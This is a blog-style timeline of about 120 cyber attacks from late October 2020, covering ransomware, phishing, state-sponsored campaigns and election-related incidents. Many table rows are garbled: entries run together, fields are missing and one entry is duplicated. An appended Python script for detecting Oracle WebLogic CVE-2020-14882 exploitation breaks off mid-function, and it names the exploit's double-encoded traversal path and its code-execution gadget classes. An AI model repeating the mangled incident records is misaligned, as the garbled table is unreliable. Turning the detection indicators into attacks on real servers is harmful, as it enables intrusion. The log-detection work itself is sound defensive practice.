It’s time to publish the second timeline of October, covering the main cyber attacks that happened in the second half of the month, plus some additional events that occurred before this period but were discovered or disclosed in the interval considered.
This timeline contains 119 events, so the drop seen in the previous timelines was apparently just an illusion. Unsurprisingly, ransomware plays an important role in these numbers: almost one out of three events is directly or indirectly related to this threat, which undoubtedly characterizes this troubled 2020 from an infosec perspective. Also in this timeline you will find many high-profile entities whose data has been encrypted and allegedly fallen into the hands of the attackers in so-called double extortion attacks. Additionally, this period has seen an unprecedented wave of attacks against healthcare institutions carried out with the Ryuk ransomware.
Another event that characterizes this timeline is the 2020 US General Election: at least four campaigns, purportedly carried out by state-sponsored actors (Iran and Russia), have tried to leverage this political event to spread misinformation. Another election-related event, but one driven by criminal purposes, is the theft of $2.3 million from the Wisconsin Republican Party’s account used to help reelect President Donald Trump.
In any case, the proximity of the elections also influenced the cyber espionage front, with multiple state-sponsored campaigns by new and old threat actors such as APT28, APT31, APT35, Turla, Energetic Bear, and MuddyWater.
Last but not least, the days of the mega breaches are not gone: a threat actor has put up for sale an aggregate total of 34 million user records that they claim were stolen from seventeen companies in data breaches.
As always, the details are in the timeline! Thanks for sharing it and supporting my work in spreading risk awareness across the community. Also, don’t forget to follow @paulsparrows on Twitter, or connect on LinkedIn, for the latest updates.
ID
Date
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
03/07/2020
?
Technology Management Resources, Inc. (TMR)
Technology Management Resources, Inc. (TMR) suffers a phishing attack. Many organizations are affected.
Account hijacking
K Financial and insurance activities
CC
US
Technology Management Resources, Inc., TMR
2
24/08/2020
?
Piedmont Community College
Piedmont Community College is hit with a ransomware attack.
Malware
P Education
CC
US
Piedmont Community College, ransomware
3
02/09/2020
?
Timberline Billing Services, Inc.
Timberline Billing Services, Inc. reveals that it suffered a ransomware attack. Many educational organizations are affected.
Malware
K Financial and insurance activities
CC
US
Timberline Billing Services, Inc., ransomware
4
12/10/2020
?
Yazoo County School District
Yazoo County School District is hit with a ransomware attack.
Malware
P Education
CC
US
Yazoo County School District, ransomware
5
14/10/2020
?
U.S. government agencies and enterprise organizations
The Federal Bureau of Investigation (FBI) issues a flash alert warning of hackers stealing data from U.S. government agencies and enterprise organizations via internet-exposed and insecure SonarQube instances.
Misconfigurations
Y Multiple Industries
CE
US
Federal Bureau of Investigation, FBI, SonarQube
6
15/10/2020
?
Columbus City Schools
Columbus City Schools notifies an undisclosed number of people whose names and social security numbers were in an employee’s email account compromised on May 1st.
Account hijacking
P Education
CC
US
Columbus City Schools
7
16/10/2020
APT31
Staffers on the Biden and Trump campaigns
Researchers from Google discover a targeted attack against staffers on the Biden and Trump campaigns abusing legitimate services.
Targeted Attack
O Public administration and defence, compulsory social security
Google reveals that in 2017 a nation-state actor launched a DDoS attack of 2.54 terabits per second.
DDoS
J Information and communication
CC
US
Google
9
16/10/2020
?
Single individuals
Phishing campaigns start to use Basecamp to distribute malware or steal login credentials.
Account hijacking
X Individual
CC
>1
Basecamp
10
16/10/2020
Ranzy Locker
Undisclosed company developing power control solutions
The ThunderX ransomware changes its name to Ranzy Locker and launches a data leak site. The first leaked victim is a company that develops power control solutions.
Malware
C Manufacturing
CC
N/A
ThunderX, ransomware, Ranzy Locker
11
16/10/2020
?
Single individuals
NPM removes four packages, plutov-slack-client, nodetest199, nodetest1010, npmpubman, which establish connection to remote servers and exfiltrate user data. The packages had collected over 1,000 total downloads.
Researchers from GreatHorn discover a new campaign propagating via open redirector domains and subsidiary domains belonging to multiple global brands, spreading through tens of thousands of mailboxes and targeting business users across industries, geographies, and companies.
Account hijacking
Y Multiple Industries
CC
>1
GreatHorn, open redirectors.
13
16/10/2020
?
Facebook users
Researchers from Cyberint discover a massive Facebook phishing campaign spreading through Facebook Messenger.
Account hijacking
X Individual
CC
>1
Cyberint, Facebook, Messenger
14
16/10/2020
?
Parker County
Parker County is impacted by a computer security incident.
Unknown
O Public administration and defence, compulsory social security
CC
US
Parker County
15
16/10/2020
?
Cosmote
Cosmote, the largest mobile network operator in Greece, reveals that information on thousands of customers was accessed during a cyber attack that occurred between September 1 and 5.
Unknown
J Information and communication
CC
GR
Cosmote
16
16/10/2020
?
Commission Kings
Commission Kings, one of the largest affiliate networks catering to a global sports betting and iGaming audience, is hit with a cyber-attack.
Unknown
R Arts entertainment and recreation
CC
US
Commission Kings
17
16/10/2020
?
Florida Department of Business and Professional Regulation
Florida Department of Business and Professional Regulation is investigating "malicious activity" that affected the state's top regulatory agency, causing days of computer system outages and disruptions to online services.
Unknown
O Public administration and defence, compulsory social security
CC
US
Florida Department of Business and Professional Regulation
18
17/10/2020
?
Albion Online
A hacker breaches the forum of Albion Online, a popular free medieval fantasy MMORPG, and steals usernames and password hashes.
WoltLab Suite Vulnerability
R Arts entertainment and recreation
CC
DE
Albion Online, WoltLab Suite
19
17/10/2020
?
narendramodi.in
Researchers from Cyble reveal that donor data of over five lakh (500,000) people has been stolen from narendramodi.in, the personal website of Prime Minister Narendra Modi, and that the details are on sale on the dark web.
Unknown
S Other service activities
CC
IN
Cyble, narendramodi.in, Narendra Modi
20
17/10/2020
?
American Museum of Natural History
The American Museum of Natural History says hackers accessed personal information about visitors in a data breach as a consequence of the Blackbaud ransomware breach.
Malware
R Arts entertainment and recreation
CC
US
American Museum of Natural History, Blackbaud, ransomware
21
18/10/2020
?
Chenango County
Chenango County is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
Chenango County, ransomware
22
19/10/2020
Netwalker
Enel Group
Multinational energy company Enel Group is hit by a Netwalker ransomware attack for the second time this year. The criminals ask a $14 million ransom.
Malware
D Electricity gas steam and air conditioning supply
CC
IT
Enel Group, Netwalker, ransomware
23
19/10/2020
RansomExx
Société de transport de Montréal (STM)
Montreal's Société de transport de Montréal (STM) public transport system is hit with a RansomExx ransomware attack that impacts services and online systems.
Malware
H Transportation and storage
CC
CA
Société de transport de Montréal, STM, RansomExx, Ransomware
24
19/10/2020
?
Coinbase users
A new phishing campaign uses a Coinbase-themed email to trick victims into authorizing a malicious Office 365 OAuth consent app, which gives the attackers access to the victim's email.
Account hijacking
V Fintech
CC
>1
Coinbase, Office 365
25
19/10/2020
Pakistani Attackers
Organizations in India
Researchers from Kaspersky identify a previously unknown piece of Android spyware related to GravityRAT.
Targeted Attack
Y Multiple Industries
CE
IN
Kaspersky, Android, GravityRAT, India, Pakistan
26
19/10/2020
?
Brazilian bank account holders
Researchers from IBM discover Vizom, a new banking trojan that uses remote overlay attacks to strike Brazilian bank account holders.
Malware
K Financial and insurance activities
CC
BR
IBM, Vizom
27
19/10/2020
?
Korean American Community
Researchers from Trend Micro disclose details of a new watering hole campaign, dubbed Operation Earth Kitsune, targeting the Korean American community, which exploits flaws in web browsers such as Google Chrome and Internet Explorer to deploy backdoors (CVE-2019-5782, CVE-2020-0674, CVE-2016-0189, CVE-2019-1458).
Targeted Attack
X Individual
CE
US
Trend Micro, Operation Earth Kitsune, Korean American Community, Google Chrome, Internet Explorer, CVE-2019-5782, CVE-2020-0674, CVE-2016-0189, CVE-2019-1458
28
19/10/2020
?
Scalable Capital
Scalable Capital notifies customers of a large data breach.
Unknown
K Financial and insurance activities
CC
DE
Scalable Capital
29
19/10/2020
?
Clearwater River Casino & Lodge
Clearwater River Casino & Lodge is hit with a ransomware attack.
Malware
R Arts entertainment and recreation
CC
US
Clearwater River Casino & Lodge, ransomware
30
19/10/2020
?
It’se Ye-Ye Casino
It’se Ye-Ye Casino is hit with a ransomware attack.
Malware
R Arts entertainment and recreation
CC
US
It’se Ye-Ye Casino, ransomware
31
19/10/2020
?
Yorktown School District
The Yorktown School District falls victim to a ransomware attack.
Malware
P Education
CC
US
Yorktown School District, ransomware
32
19/10/2020
?
Croton-Harmon School District
The Croton-Harmon School District falls victim to a ransomware attack.
Malware
P Education
CC
US
Croton-Harmon School District, ransomware
33
20/10/2020
UNC1878
Sopra Steria
French IT services giant Sopra Steria is hit with a Ryuk ransomware cyberattack.
Malware
M Professional scientific and technical activities
CC
FR
Sopra Steria, Ryuk, Ransomware
34
20/10/2020
Chinese state-sponsored attackers
Multiple targets
Cisco warns of attacks actively exploiting CVE-2020-3118, a high-severity vulnerability in the Cisco Discovery Protocol implementation of Cisco IOS XR Software that affects multiple carrier-grade routers.
CVE-2020-3118 Vulnerability
Y Multiple Industries
CE
>1
Cisco, CVE-2020-3118, China
35
20/10/2020
Chinese state-sponsored attackers
U.S. organizations and interests
The U.S. National Security Agency (NSA) warns that Chinese state-sponsored hackers are exploiting 25 different vulnerabilities in attacks against U.S. organizations and interests.
Multiple Vulnerabilities
Y Multiple Industries
CE
US
China
36
20/10/2020
?
Multiple targets
Google updates Chrome to address five security vulnerabilities, one of which (CVE-2020-15999, a heap buffer overflow in the FreeType font library) is actively exploited in the wild.
CVE-2020-15999 Vulnerability
Y Multiple Industries
CC
>1
Google, Chrome, CVE-2020-15999
37
20/10/2020
?
Chrome users
The Nano Adblocker and Nano Defender Chromium extensions, installed about 300,000 times, are updated with malicious code that uploads user data.
Malware
X Individual
CC
>1
Nano Adblocker, Nano Defender
38
20/10/2020
?
City of Shafter
The City of Shafter is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
City of Shafter, ransomware
39
20/10/2020
?
OSF HealthCare System
OSF HealthCare System reveals that it was affected by the Blackbaud ransomware attack.
Malware
Q Human health and social work activities
CC
US
OSF HealthCare System, Blackbaud, ransomware
40
20/10/2020
UNC1878
Dickinson County Healthcare System
The Dickinson County Healthcare System is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, Dickinson County Healthcare System
41
21/10/2020
WastedLocker
Boyne Resorts
US-based ski and golf resort operator Boyne Resorts suffers a cyberattack by the WastedLocker ransomware operation that impacts company-wide reservation systems.
Malware
I Accommodation and food service activities
CC
US
Boyne Resorts, WastedLocker, ransomware
42
21/10/2020
?
Psykoterapiakeskus Vastaamo (Psychotherapy Center Vastaamo)
A threat actor demands a ransom for a client database containing confidential information belonging to Psykoterapiakeskus Vastaamo, stolen in a data breach that likely happened almost two years ago.
Unknown
Q Human health and social work activities
CC
FI
Psykoterapiakeskus Vastaamo, Psychotherapy Center Vastaamo
43
20/10/2020
DoppelPaymer
Pascagoula-Gautier School District
The Pascagoula-Gautier School District is hit by a DoppelPaymer ransomware attack.
Malware
P Education
CC
US
Pascagoula-Gautier School District, DoppelPaymer, ransomware
44
21/10/2020
?
Nitro Software
Nitro Software issues an advisory to the Australian Securities Exchange (ASX), stating that it was affected by a "low impact security incident" and that no customer data was impacted. Shortly afterwards, a threat actor is found selling the company's user and document databases, as well as 1TB of documents.
Unknown
M Professional scientific and technical activities
CC
US
Nitro Software
45
21/10/2020
?
macOS users
Researchers from Intego discover six new macOS malware samples (adware) that passed through Apple's notarization process.
Malware
X Individual
CC
>1
Intego, macOS, notarization
46
21/10/2020
?
Multiple targets
Researchers from G Data discover a new version of T-RAT, a Windows Remote Administration tool that can be controlled via a Telegram channel.
Malware
Y Multiple Industries
CC
>1
G Data, T-RAT, Telegram
47
21/10/2020
?
Multiple targets
Multiple threat actors are exploiting three vulnerabilities in MobileIron MDM (CVE-2020-15505, a remote code execution flaw, CVE-2020-15506, an authentication bypass, and CVE-2020-15507, an arbitrary file read) to take over crucial enterprise servers and even orchestrate intrusions inside company networks.
Researchers from Trustwave discover massive databases with detailed information about 186 million US voters and consumers offered for sale on several hacker forums.
Unknown
X Individual
CC
US
Trustwave
49
21/10/2020
MuddyWater AKA SeedWorm, Mercury
Companies and government agencies in the Middle East region
Researchers from Symantec disclose the details of a new campaign by the Iranian group known as Seedworm (aka MuddyWater), which uses new tools and targets companies and government agencies in the Middle East region.
Targeted Attack
Y Multiple Industries
CE
>1
Symantec, Seedworm, MuddyWater, Mercury
50
21/10/2020
?
Fort Bragg military base Twitter account
A malicious hacker is blamed for a series of messages posted from the Twitter account of the Fort Bragg military base.
Account hijacking
O Public administration and defence, compulsory social security
CC
US
Twitter, Fort Bragg
51
21/10/2020
?
Marks & Spencer customers
Criminals impersonate the CEO of Marks & Spencer to trick victims into sharing their bank account details.
Account hijacking
G Wholesale and retail trade
CC
UK
Marks & Spencer
52
21/10/2020
?
City of Salem
The City of Salem is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
Salem, ransomware
53
21/10/2020
REvil AKA Sodinokibi
Ansa McAl
The Caribbean’s biggest conglomerate, Ansa McAl, is the victim of a REvil ransomware attack.
Malware
S Other service activities
CC
BB
Ansa McAl, REvil, Sodinokibi, ransomware
54
21/10/2020
LockBit
Multiple targets
Researchers from Sophos reveal the details of a LockBit ransomware campaign targeting multiple organizations.
Malware
Y Multiple Industries
CC
>1
Sophos, LockBit, ransomware
55
22/10/2020
?
AdventHealth Foundation
The AdventHealth Foundation alerts donors of a security breach caused by the Blackbaud ransomware attack.
Malware
Q Human health and social work activities
CC
US
AdventHealth Foundation, Blackbaud, ransomware
56
22/10/2020
UNC1878
Steelcase
Office furniture giant Steelcase suffers a Ryuk ransomware attack that forces them to shut down the network.
The DHS Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warn that the Russian state-sponsored APT known as Energetic Bear has hacked and stolen data from US government networks during the last two months.
Targeted Attack
O Public administration and defence, compulsory social security
The DHS Cybersecurity and Infrastructure Security Agency (CISA) and the FBI issue an alert to warn that an Iranian threat actor recently accessed voter registration data.
Vulnerability
O Public administration and defence, compulsory social security
CW
US
DHS, CISA, FBI, Iran
59
22/10/2020
?
Vulnerable Content Management Servers
Researchers from Imperva discover KashmirBlack, a highly sophisticated botnet believed to have infected hundreds of thousands of websites by attacking their underlying content management system (CMS) platforms like WordPress, Joomla, Drupal.
Multiple Vulnerabilities
Y Multiple Industries
CC
>1
Imperva, KashmirBlack, WordPress, Joomla, Drupal
60
22/10/2020
?
Dr. Reddy's Laboratories
Pharmaceutical company Dr Reddy's, which is developing a Covid-19 vaccine, says it has been hit by a cyber-attack.
Unknown
Q Human health and social work activities
CC
IN
Dr. Reddy's Laboratories
61
22/10/2020
?
Office 365 Users
Researchers from Abnormal Security discover a phishing campaign targeting Office 365 users with a fake automated message from Microsoft Teams.
Account hijacking
Y Multiple Industries
CC
>1
Abnormal Security, Office 365, Microsoft Teams
62
22/10/2020
?
Made in Oregon
Data belonging to 7,800 customers of Made in Oregon is compromised in a breach that lasted six months. According to the gift retailer, an unauthorized party gained access to its e-commerce site between the first week of February 2020 and the last week of August 2020.
Unknown
G Wholesale and retail trade
CC
US
Made in Oregon
63
22/10/2020
?
Robert Koch Institute
Germany’s Robert Koch Institute for infectious disease control is hit with a DDoS attack.
DDoS
M Professional scientific and technical activities
CC
DE
Robert Koch Institute
64
22/10/2020
?
Indian River County
Indian River County officials investigate a cybersecurity incident that has shut down employee emails, VoIP phones, and the county’s website.
Unknown
O Public administration and defence, compulsory social security
CC
US
Indian River County
65
22/10/2020
REvil AKA Sodinokibi
Shionogi & Co.
Japanese pharmaceutical firm Shionogi & Co. reveals that its Taiwanese subsidiary was hit by a ransomware attack earlier this month leading to a data breach, although no information regarding the novel coronavirus vaccine it is currently developing was leaked.
Malware
M Professional scientific and technical activities
CC
TW
REvil, Sodinokibi, Shionogi & Co., ransomware
66
22/10/2020
?
Sonoma Valley Hospital
Sonoma Valley Hospital reports that a security incident on October 11 knocked out its computer systems, which are not yet fully restored.
Unknown
Q Human health and social work activities
CC
US
Sonoma Valley Hospital
67
22/10/2020
?
Keolis Commuter Services
Keolis Commuter Services reveals that it was hit with a ransomware attack on October 22.
Malware
H Transportation and storage
CC
US
Keolis Commuter Service, ransomware
68
22/10/2020
?
Single individuals
Researchers from Proofpoint discover an updated election-themed phishing campaign conceived to harvest more information, including banking credentials, account data and vehicle identification information.
Account hijacking
X Individual
CC
US
Proofpoint
69
23/10/2020
?
Fragomen, Del Rey, Bernsen & Loewy, LLP
Immigration law firm Fragomen, Del Rey, Bernsen & Loewy, LLP discloses a data breach that exposed current and former Google employees' personal information after its network was compromised.
Unknown
M Professional scientific and technical activities
CC
US
Fragomen, Del Rey, Bernsen & Loewy, LLP, Google
70
23/10/2020
?
Single individuals
A new remote access trojan (RAT) dubbed 'Abaddon' is the first malware that uses Discord as a full-fledged command and control server.
Malware
X Individual
CC
>1
Abaddon, Discord
71
24/10/2020
?
Multiple targets
A new Emotet campaign switches to a new template that pretends to be a Microsoft Office message stating that Microsoft Word needs to be updated to add a new feature.
Malware
Y Multiple Industries
CC
>1
Emotet, Microsoft Office
72
24/10/2020
?
Android Users
Google removes 15 of 21 Android applications from the official Play Store, following a report from Czech antivirus maker Avast. The apps are infected with a type of malware known as HiddenAds.
Malware
X Individual
CC
>1
Google, Android, Play Store, Avast, HiddenAds
73
24/10/2020
LockBit
Press Trust of India (PTI)
Press Trust of India (PTI) is hit with a LockBit ransomware attack.
Malware
J Information and communication
CC
IN
Press Trust of India, PTI, LockBit, ransomware
74
24/10/2020
?
Centerstone
Centerstone reveals that it suffered a phishing attack between December 12 and December 16, 2019.
Account hijacking
Q Human health and social work activities
CC
US
Centerstone
75
25/10/2020
?
Arabic-speaking Netflix users
Researchers from Kaspersky discover a wave of phishing attacks that use a malicious website disguised as the Arabic-language Netflix page.
Account hijacking
R Arts entertainment and recreation
CC
>1
Kaspersky, Netflix
76
25/10/2020
?
Ledger
Customers of Ledger, the hardware cryptocurrency wallet, are targeted by a phishing attack posing as an email from Ledger support.
Account hijacking
V Fintech
CC
>1
Ledger, Crypto
77
25/10/2020
Eris Loris
Players of the 'Among Us' Android game
Players of 'Among Us' are spammed in-game with messages from a player named Eris Loris, rendering the game unplayable.
Unknown
R Arts entertainment and recreation
CC
US
Among Us, Eris Loris
78
26/10/2020
?
Harvest Finance
A hacker steals roughly $24 million worth of cryptocurrency assets from decentralized finance service Harvest Finance.
Unknown
V Fintech
CC
N/A
Harvest Finance
79
26/10/2020
?
Japan’s Nuclear Regulation Authority (NRA)
Japan’s Nuclear Regulation Authority (NRA) temporarily suspends its email systems after a possible cyber attack.
Unknown
O Public administration and defence, compulsory social security
CE
JP
Japan’s Nuclear Regulation Authority, NRA
80
26/10/2020
?
President Donald Trump’s campaign website
President Donald Trump’s campaign website is briefly hacked in what appears to be a crude effort to promote a cryptocurrency scam, but the campaign said no sensitive data was exposed.
Defacement
X Individual
CC
US
Donald Trump, Crypto
81
26/10/2020
?
Multiple targets
A few days after the TrickBot takedown, researchers from Netscout spot a new Linux variant of the TrickBot-linked Anchor backdoor.
Malware
Y Multiple Industries
CC
>1
TrickBot, Netscout, Linux, Anchor
82
26/10/2020
?
Mithaas
Mithaas is the victim of a ransomware attack. The attack occurred on August 22.
Malware
I Accommodation and food service activities
CC
IN
Mithaas, ransomware
83
26/10/2020
?
Nando’s Customers
Some customers of popular high street eatery Nando’s are the victims of a credential stuffing attack.
Credential Stuffing
I Accommodation and food service activities
CC
UK
Nando’s
84
26/10/2020
REvil AKA Sodinokibi
Hanover Chamber of Crafts
The Hanover Chamber of Crafts is hit with a REvil ransomware attack.
Malware
S Other service activities
CC
DE
Hanover Chamber of Crafts, REvil ransomware, Sodinokibi
85
26/10/2020
?
Department of Workforce Development in Wisconsin
The Department of Workforce Development in Wisconsin suffers a credential stuffing attack.
Credential Stuffing
O Public administration and defence, compulsory social security
CC
US
Department of Workforce Development, Wisconsin
86
27/10/2020
?
Individuals and organizations in South Korea, Japan, and the United States
The Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the Cyber Command Cyber National Mission Force (CNMF), release an alert about the North Korean Threat Actor Kimsuky (AKA Hidden Cobra) targeting individuals and organizations in South Korea, Japan, and the United States.
Targeted Attack
Y Multiple Industries
CE
>1
CISA, FBI, and the Cyber Command Cyber National Mission Force, CNMF, North Korea, Kimsuky, Hidden Cobra, South Korea, Japan, United States
87
27/10/2020
Kimsuky
Single individuals in the US
Researchers from Digital Shadows reveal that threat actors from Russia are trying to undermine the US presidential election with disinformation campaigns.
Fake websites, social network accounts
X Individual
CW
US
Digital Shadows, Russia
88
27/10/2020
?
Single individuals in the US
Researchers from Digital Shadows reveal that threat actors from Iran are trying to undermine the US presidential election with disinformation campaigns.
Fake websites, social network accounts
X Individual
CW
US
Digital Shadows, Iran
89
27/10/2020
?
Isentia
Media monitoring giant Isentia is hit with a ransomware attack.
Malware
M Professional scientific and technical activities
CC
AU
Isentia, ransomware
90
27/10/2020
?
Single individuals
Researchers from Sophos discover a phishing campaign carried out via fraudulent Facebook messages alleging copyright infringement and threatening to take down pages, unless users enter logins, passwords and 2FA codes.
Account hijacking
X Individual
CC
>1
Sophos, Facebook, copyright infringement
91
28/10/2020
?
17 companies
A threat actor sells account databases containing an aggregate total of 34 million user records that they claim were stolen from seventeen companies during data breaches.
Researchers from Microsoft disclose that Iranian state-sponsored hackers successfully hacked into the email accounts of multiple high-profile individuals and potential attendees at this year's Munich Security Conference and the Think 20 (T20) summit.
Targeted Attack
O Public administration and defence, compulsory social security
Researchers from Microsoft disclose that Iranian state-sponsored hackers successfully hacked into the email accounts of multiple high-profile individuals and potential attendees at this year's Munich Security Conference and the Think 20 (T20) summit.
Targeted Attack
O Public administration and defence, compulsory social security
Hackers publish online at least 38,000 documents stolen from Gunnebo Group in March 2020.
Unknown
C Manufacturing
CC
SE
Gunnebo Group
96
28/10/2020
?
Jewish General Hospital
The Jewish General Hospital in Montreal is hit with a cyber attack.
Unknown
Q Human health and social work activities
CC
CA
Jewish General Hospital
97
28/10/2020
?
Virginia Beach City Public Schools
Virginia Beach City Public Schools investigates after someone intruded into a Zoom classroom filled with 5th graders and showed a picture of a man’s body parts on the screen.
Zoom bombing
P Education
CC
US
Virginia Beach City Public Schools, Zoom
98
28/10/2020
?
Chatham County
Chatham County is hit with a ransomware attack.
Malware
O Public administration and defence, compulsory social security
CC
US
Chatham County, ransomware
99
29/10/2020
UNC1878
Wyckoff Heights Medical Center
Wyckoff Heights Medical Center is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, Wyckoff Heights Medical Center
100
29/10/2020
UNC1878
University of Vermont Health Network
University of Vermont Health Network is hit with a Ryuk ransomware attack. Six hospitals are affected.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, University of Vermont Health Network
101
29/10/2020
UNC1878
Sky Lakes Medical Center
The Sky Lakes Medical Center is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, Sky Lakes Medical Center
102
29/10/2020
UNC1878
St. Lawrence Health System
The St. Lawrence Health System is hit with a Ryuk ransomware attack.
Malware
Q Human health and social work activities
CC
US
Ryuk, ransomware, UNC1878, St. Lawrence Health System
103
29/10/2020
?
Lazada Redmart
Singapore's largest online grocery store, Lazada Redmart, suffers a data breach after 1.1 million user accounts are put up for sale on a hacker forum.
Unknown
G Wholesale and retail trade
CC
SG
Lazada Redmart
104
29/10/2020
?
Wisconsin Republican Party’s account
Hackers steal $2.3 million from the Wisconsin Republican Party’s account used to help reelect President Donald Trump.
Account hijacking
S Other service activities
CC
US
Wisconsin, Republican Party
105
29/10/2020
?
Vulnerable Oracle WebLogic servers
Threat actors are scanning for Oracle WebLogic servers vulnerable to CVE-2020-14882, an unauthenticated remote code execution flaw in the administration console fixed in Oracle's October 2020 Critical Patch Update.
CVE-2020-14882 Vulnerability
Y Multiple Industries
CC
US
Oracle WebLogic, CVE-2020-14882
106
29/10/2020
?
Multiple targets
Microsoft warns that threat actors are continuing to actively exploit systems unpatched against the ZeroLogon vulnerability (CVE-2020-1472).
CVE-2020-1472 Vulnerability
Y Multiple Industries
CC
>1
Microsoft, ZeroLogon, CVE-2020-1472
107
29/10/2020
Turla AKA VENOMOUS BEAR, Waterbug
Ministries of foreign affairs & national parliaments
The US Cyber Command shares information on malware implants (ComRAT) used by the Russian hacking group Turla.
Targeted Attack
O Public administration and defence, compulsory social security
CE
>1
Turla, VENOMOUS BEAR, Waterbug, US Cyber Command, ComRAT
108
29/10/2020
APT28 AKA Sofacy, Fancy Bear, Sednit, STRONTIUM
Governments around the world
The US Cyber Command shares information on malware implants (Zebrocy) used by the Russian hacking group APT28.
Targeted Attack
O Public administration and defence, compulsory social security
CE
>1
APT28, Sofacy, Fancy Bear, Sednit, STRONTIUM, US Cyber Command, Zebrocy
109
29/10/2020
?
Multiple targets
Researchers from Palo Alto Networks discover a new Emotet campaign abusing parked domains and impersonating McAfee.
Malware
Y Multiple Industries
CC
>1
Palo Alto Networks, Emotet, McAfee
110
29/10/2020
Roaming Mantis
U.S. Android and iPhone mobile banking users
Researchers from Kaspersky reveal that the Roaming Mantis group is targeting the US with the Wroba mobile banking trojan that can steal information, harvest financial data and send texts to self-propagate.
Malware
K Financial and insurance activities
CC
US
Kaspersky, Roaming Mantis, Wroba, Android, iOS
111
29/10/2020
DoNot
Kashmiri non-profit organizations and Pakistani government officials
Researchers from Cisco Talos discover Firestarter, a new Android mobile malware using Google Firebase as a command and control infrastructure.
Malware
O Public administration and defence, compulsory social security
CE
PK
Cisco Talos, Firestarter, Android, Google Firebase, Kashmir
112
29/10/2020
?
Multiple targets
Researchers from Inky reveal that cybercriminals are hijacking legitimate email accounts from more than a dozen universities – including Purdue University, University of Oxford, and Stanford University – and using the accounts to bypass detection and trick victims into handing over their email credentials or installing malware.
Account hijacking
Y Multiple Industries
CC
>1
Inky, Purdue University, University of Oxford, Stanford University
113
30/10/2020
?
Multiple targets
Researchers from Google's Project Zero disclose a zero-day vulnerability in the Windows kernel (CVE-2020-17087) that is actively exploited in targeted attacks, chained with the Chrome vulnerability CVE-2020-15999.
DHS CISA and the FBI share more info on how an Iranian state-sponsored hacking group was able to harvest voter registration info from U.S. state websites, including election sites, and use the harvested data to send fake Proud Boys voter intimidation emails to Democratic voters attempting to convince them to vote for President Trump.
>1
O Public administration and defence, compulsory social security
CW
US
DHS, CISA, FBI, Democratic Party, Proud Boys, President Trump
115
30/10/2020
?
Single individuals
Researchers from Netskope discover a new campaign spreading spam messages being shared via Google Docs.
Malicious Spam
X Individual
CC
>1
Netskope, Google Docs
116
30/10/2020
NetWalker
CMC
CMC in Ravenna is hit with a NetWalker ransomware attack.
Malware
C Manufacturing
CC
IT
CMC, NetWalker, ransomware
117
30/10/2020
?
Rady Children’s Hospital
Rady Children’s Hospital reveals that it was affected by the Blackbaud ransomware attack.
Malware
Q Human health and social work activities
CC
US
Rady Children’s Hospital, Blackbaud, ransomware
118
31/10/2020
?
Vulnerable Oracle WebLogic servers
Threat actors are actively exploiting Oracle WebLogic servers unpatched against CVE-2020-14882 to deploy Cobalt Strike beacons which allow for persistent remote access to compromised devices.
CVE-2020-14882 Vulnerability
Y Multiple Industries
CC
US
Oracle WebLogic, CVE-2020-14882, Cobalt Strike
119
31/10/2020
?
Multiple targets
A new Emotet campaign sends out spam emails that invite the victim to a Halloween party.
Malware
Y Multiple Industries
CC
>1
Emotet, Halloween
120
31/10/2020
REvil AKA Sodinokibi
Gaming Partners International (GPI)
The REvil ransomware operators claim to have hacked Gaming Partners International (GPI).
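Entries 105 and 118 above record scanning for, and then active exploitation of, CVE-2020-14882 in Oracle WebLogic, the second time to drop Cobalt Strike beacons. As an added example (not code from the original timeline or from Oracle), the Python script below flags exploitation attempts in a web server access log. The public exploit reaches the console's `console.portal` from an unauthenticated static path such as `/console/css/` by hiding a `../` as the double-encoded `%252e%252e%252f`, and then passes a gadget class in the `handle` parameter; the script percent-decodes each request target until it stops changing, checks for that traversal, and looks for the two gadget class names reported in the wild. The log lines are constructed for illustration, the function names are mine, and the request-line regex assumes Apache/Nginx combined log format.

```python
"""Flag CVE-2020-14882 (Oracle WebLogic console auth bypass / RCE) attempts in
web-server access logs.

Added example for this timeline, not code from the original post.  Sample log
lines are constructed; IPs come from documentation ranges.  The path and
gadget-class indicators are those publicly reported for in-the-wild
exploitation in late October 2020.
"""
import re
from urllib.parse import unquote, urlsplit

# Combined log format request line: "METHOD TARGET HTTP/x.y" (assumption about log format)
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Static resource prefixes reachable without authentication on the WebLogic
# console; the exploit traverses from one of them back into console.portal.
STATIC_PREFIXES = ("/console/css/", "/console/images/")

# Gadget classes observed in the "handle" parameter of in-the-wild exploits.
GADGET_MARKERS = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)


def fully_decode(text, max_rounds=3):
    """Percent-decode until the string stops changing (the exploit uses
    %252e%252e%252f, a double-encoded ../, to slip past the console's filter)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_request(target):
    """Return the reasons a request target looks like CVE-2020-14882
    exploitation; an empty list means nothing suspicious was found."""
    reasons = []
    parts = urlsplit(target)
    raw_path = parts.path
    decoded_path = fully_decode(raw_path)
    decoded_query = fully_decode(parts.query)

    # 1. The path only reveals a parent-directory segment after decoding.
    if raw_path != decoded_path and "/../" in decoded_path + "/":
        reasons.append("encoded path traversal")

    # 2. Traversal from an unauthenticated static prefix into console.portal:
    #    the authentication-bypass primitive of CVE-2020-14882.
    if decoded_path.startswith(STATIC_PREFIXES) and decoded_path.rstrip("/").endswith("console.portal"):
        reasons.append("static prefix reaches console.portal")

    # 3. A known code-execution gadget passed through the handle parameter.
    if "handle=" in decoded_query and any(m in decoded_query for m in GADGET_MARKERS):
        reasons.append("known RCE gadget in handle parameter")

    return reasons


def scan_log(lines):
    """Return (line_number, client_ip, target, reasons) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
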